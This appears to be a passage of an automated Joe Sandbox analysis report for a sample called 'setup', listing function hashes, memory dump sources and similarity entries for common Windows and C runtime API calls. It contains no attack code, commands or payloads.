                                                                                                    • Opcode ID: 0255359e8a09d4949fab560796efcc3ed9be87e1c6569cd6f786d6e2ff02a213
                                                                                                    • Instruction ID: 906f011e61f7ef5fd4dd27d7144f205036ed5055be72aa4a86709062c5170542
                                                                                                    • Opcode Fuzzy Hash: 0255359e8a09d4949fab560796efcc3ed9be87e1c6569cd6f786d6e2ff02a213
                                                                                                    • Instruction Fuzzy Hash: EE21E2B5A04705DFCB15EFA8E980A9DBBF1BB89300F21852ED94897311E734A911CF85
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: State$Window$ProcShowcallocfree
                                                                                                    • String ID:
                                                                                                    • API String ID: 4245685813-0
                                                                                                    • Opcode ID: 1b6ad9156f31728757bb8a16cb8a7d934afa61f2a488a8b88eb79534c69681b2
                                                                                                    • Instruction ID: f8cb11e8c9cb6f760ee2faae3750b86e319e1b9f021c06fbf38f9e3b966ab9c2
                                                                                                    • Opcode Fuzzy Hash: 1b6ad9156f31728757bb8a16cb8a7d934afa61f2a488a8b88eb79534c69681b2
                                                                                                    • Instruction Fuzzy Hash: ED41FDB4A187409FD754DF29C484A5EFBE0FF88311F118A2EE89983261D375E9958F42
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$CloseCreateHandleWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 1065093856-0
                                                                                                    • Opcode ID: 51410327847cf35e6f2d6494e0d83e3748bed16020f82a685c88cae407822f44
                                                                                                    • Instruction ID: 98b1e7f4f596aa48215149039ed8cb468e51d52d92241572505f22a4fbafb32b
                                                                                                    • Opcode Fuzzy Hash: 51410327847cf35e6f2d6494e0d83e3748bed16020f82a685c88cae407822f44
                                                                                                    • Instruction Fuzzy Hash: EE0175B05093019FD700EF38D58970BBBF0BB89354F058E2DE89987295E3B9D959CB82
                                                                                                    APIs
                                                                                                    • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,00000001,00247ECC), ref: 00248F1A
                                                                                                    Strings
                                                                                                    • Win32: Failed to create interface, xrefs: 00248F65
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: HandleModule
                                                                                                    • String ID: Win32: Failed to create interface
                                                                                                    • API String ID: 4139908857-3250580677
                                                                                                    • Opcode ID: e07d0c5c21b0ca096b2526909e0c0f6b4624b4f4c6a7ccd0bfe57c7836d1080e
                                                                                                    • Instruction ID: f72e21e3902f60b5864168b2f2ccba3cc7c42efea50addcaa1654f8166332c2a
                                                                                                    • Opcode Fuzzy Hash: e07d0c5c21b0ca096b2526909e0c0f6b4624b4f4c6a7ccd0bfe57c7836d1080e
                                                                                                    • Instruction Fuzzy Hash: BBF09AB44383018FD304BF24E98831F7BE0EB41344F90891DE8C556241EBB4D4A8CB56
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Uninitialize
                                                                                                    • String ID: 0y(
                                                                                                    • API String ID: 3861434553-274880199
                                                                                                    • Opcode ID: 571196308e5e71bf21d8b95b563b873d3e6c03ce779e1c7e50f333a655a091a1
                                                                                                    • Instruction ID: 0cbb61c127cd4874efeccdea6c64acd741e916677f6785da981e9e9468f28765
                                                                                                    • Opcode Fuzzy Hash: 571196308e5e71bf21d8b95b563b873d3e6c03ce779e1c7e50f333a655a091a1
                                                                                                    • Instruction Fuzzy Hash: 5EF037B45087808FE320AF35E94A30A7BF1BB58304F0492A8D88587361E7B5C848DF46
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseCreateHandleThread
                                                                                                    • String ID:
                                                                                                    • API String ID: 3032276028-0
                                                                                                    • Opcode ID: 6806997782424addc343983690396a18668c4d308a8c3a7d20d7c2340d2acca6
                                                                                                    • Instruction ID: 95e6bbf3d05d709e8c171c8372a9fe5af5d1e7e42f082a1a2b6b8231a3273085
                                                                                                    • Opcode Fuzzy Hash: 6806997782424addc343983690396a18668c4d308a8c3a7d20d7c2340d2acca6
                                                                                                    • Instruction Fuzzy Hash: 04F0C2B05093419FDB00AFA9DA8830EBFF0BB85345F80892CE4848B245E7B984588B93
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Temp$FileNamePath
                                                                                                    • String ID:
                                                                                                    • API String ID: 3285503233-0
                                                                                                    • Opcode ID: cb03ea1e5a039e5688f44b88d7d3695d866318707755384fe940b0c0d6a04c87
                                                                                                    • Instruction ID: bce0e49c58b916ac5a8c07483f243b6d3499f666ad3bc21dfbf9d7e4e8138317
                                                                                                    • Opcode Fuzzy Hash: cb03ea1e5a039e5688f44b88d7d3695d866318707755384fe940b0c0d6a04c87
                                                                                                    • Instruction Fuzzy Hash: E6E0EEF080A3009FD340AF68EA8921EBFE0AB84301F40892DE4C842245E7B880988B63
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: malloc$free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1480856625-0
                                                                                                    • Opcode ID: bfa1af78457b61294abf6c57c039b481a474ea30747c3ec5451fcfb03ecba547
                                                                                                    • Instruction ID: a07732e4134387838f5133d7bf67cc06ebc201fe37d85dc8abe79fb3443b124b
                                                                                                    • Opcode Fuzzy Hash: bfa1af78457b61294abf6c57c039b481a474ea30747c3ec5451fcfb03ecba547
                                                                                                    • Instruction Fuzzy Hash: FE21F8B441A7118BC3127F60E59622EBAE0EF52749F429C1CE5C94F352DB7884948F9B
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 001C19E1
                                                                                                    • memcpy.MSVCRT(?,?,?,00000004,00000000,00000000,001C1A79,00000000,00000000,?,001C1B52), ref: 001C19FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 4276657696-0
                                                                                                    • Opcode ID: 2c6d32170590453c7e6d4b77db946e731c4b023d156cd9effd5de32d41398a33
                                                                                                    • Instruction ID: 853acba893bfe184b44ef613d45e3f373a2366be2e289711b1b7a39f798eda03
                                                                                                    • Opcode Fuzzy Hash: 2c6d32170590453c7e6d4b77db946e731c4b023d156cd9effd5de32d41398a33
                                                                                                    • Instruction Fuzzy Hash: 27015A75A19300AFD720AF6DD480E1ABBE4EF8A314F95486EF988C7712D732D8108B51
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: free
                                                                                                    • String ID:
                                                                                                    • API String ID: 1294909896-0
                                                                                                    • Opcode ID: 2863a3e224c5b6115fbf4b9e6e11e3bb53a95180e91cd43dcd39bb14a1d2147c
                                                                                                    • Instruction ID: 7ee5cb25db05eb4bcde33a62429c5a040b866ace7c30980c2ba94ea69e4aa264
                                                                                                    • Opcode Fuzzy Hash: 2863a3e224c5b6115fbf4b9e6e11e3bb53a95180e91cd43dcd39bb14a1d2147c
                                                                                                    • Instruction Fuzzy Hash: 77F03475A443009BCB20EF68E8C1A9AB3E0BF19354F05496CE88997702E331FD509F91
                                                                                                    APIs
                                                                                                    • malloc.MSVCRT ref: 001C19E1
                                                                                                    • memcpy.MSVCRT(?,?,?,00000004,00000000,00000000,001C1A79,00000000,00000000,?,001C1B52), ref: 001C19FB
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000035C000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463767689.000000000035D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463787977.000000000035F000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463806968.0000000000360000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000415000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.000000000043F000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000444000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000449000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463872673.0000000000452000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000453000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.0000000000458000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463989536.00000000004B2000.00000008.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1464107027.00000000004EB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_4_2_1c0000_setup.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: mallocmemcpy
                                                                                                    • String ID:
                                                                                                    • API String ID: 4276657696-0
                                                                                                    • Opcode ID: 223c1bd6b89e647c58ff400f4fe48360ef4aaaf5a48989e2acd574cb12cf458d
                                                                                                    • Instruction ID: 3d457fdc22419583a9949f9a195b7337e80a92410eb59a94aad4dcf926cf7769
                                                                                                    • Opcode Fuzzy Hash: 223c1bd6b89e647c58ff400f4fe48360ef4aaaf5a48989e2acd574cb12cf458d
                                                                                                    • Instruction Fuzzy Hash: 14F09275A19741AFC710AFADD48080ABBE0BF89350F56482EE98897311DA31E8118B42
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000004.00000002.1463576034.00000000001C1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001C0000, based on PE: true
                                                                                                    • Associated: 00000004.00000002.1463550952.00000000001C0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463703532.000000000033B000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                    • Associated: 00000004.00000002.1463725765.000000000033D000.00000008.00000001.01000000.00000009.sdmpDownload File
